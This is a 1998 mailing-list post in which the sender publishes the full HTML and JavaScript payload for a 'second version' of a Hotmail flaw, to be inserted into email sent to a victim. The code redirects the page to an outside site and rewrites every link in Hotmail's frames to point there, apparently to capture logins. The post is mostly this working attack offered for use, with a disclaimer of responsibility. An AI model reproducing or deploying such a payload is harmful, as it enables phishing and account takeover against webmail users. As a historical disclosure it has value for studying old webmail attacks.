Date: Wed, 26 Aug 1998 18:21:40 +0200
From: Jonathan James <james@MBOX304.SWIPNET.SE>
Subject: SV: Serious Security Hole in Hotmail

 Dear all.
I've got some e-mail-requests concerning my "second" version of the
"hotmail flaw", so I've decided to post the code. This has been tested on
IE 4.0 > and Netscape 3.0 >.
The code attached should be inserted into the mail that is sent to the
victim.
Remember. I may NOT be responsible for any of your actions, when
implementing the contents of the attached file etc.
Thankyou.

Regards

[uudecoded file below]

<html>
<meta http-equiv="refresh" content="1; url=http://www.because-we-can.com/hotmail/default.htm">
<head></head><body>
<P>Hotmail flaw. (second version)
<script>
errurl="http://http://www.because-we-can.com/hotmail/default.htm";

nomenulinks=top.submenu.document.links.length;
for(i=0;i<nomenulinks-1;i++){
top.submenu.document.links[i].target="work";
top.submenu.document.links[i].href=errurl;
}
noworklinks=top.work.document.links.length;
for(i=0;i<noworklinks-1;i++){
top.work.document.links[i].target="work";
top.work.document.links[i].href=errurl;
}
</script>
</body>
</html>